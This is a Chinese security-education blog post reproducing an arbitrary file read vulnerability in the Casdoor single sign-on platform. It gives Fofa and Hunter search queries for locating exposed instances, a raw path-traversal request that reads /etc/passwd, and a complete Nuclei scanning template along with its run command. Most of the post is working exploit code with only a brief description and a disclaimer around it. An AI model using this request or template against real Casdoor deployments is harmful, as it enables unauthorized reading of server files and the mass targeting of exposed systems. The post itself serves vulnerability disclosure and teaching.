免费&进群
本文由掌控安全学院 - 江月 投稿
【漏洞介绍】
Casdoor系统static存在任意文件读取漏洞
【漏洞描述】
Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。
【资产测绘Query】
Fofa:title:”Casdoor”
Hunter:web.title=”Casdoor”
【漏洞复现】
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
【Nuclei-Poc】
id: template-id
info:
name: Template Name
author: xxx
severity: info
description: description
reference:
- https://
tags: tags
requests:
- raw:
- |+
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- root
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0"
【验证】
nuclei.exe -duc -u http://target.com -t C:Usersxxxnuclei-templatesCasdoor-demo.yaml -debug
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
分享本文到朋友圈,可以凭截图找老师领取
上千教程+工具+交流群+靶场账号哦
分享后扫码加我!
回顾往期内容
代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
点赞+在看支持一下吧~感谢看官老爷~
你的点赞是我更新的动力
原文始发于微信公众号(掌控安全EDU):【漏洞复现】Casdoor-任意文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论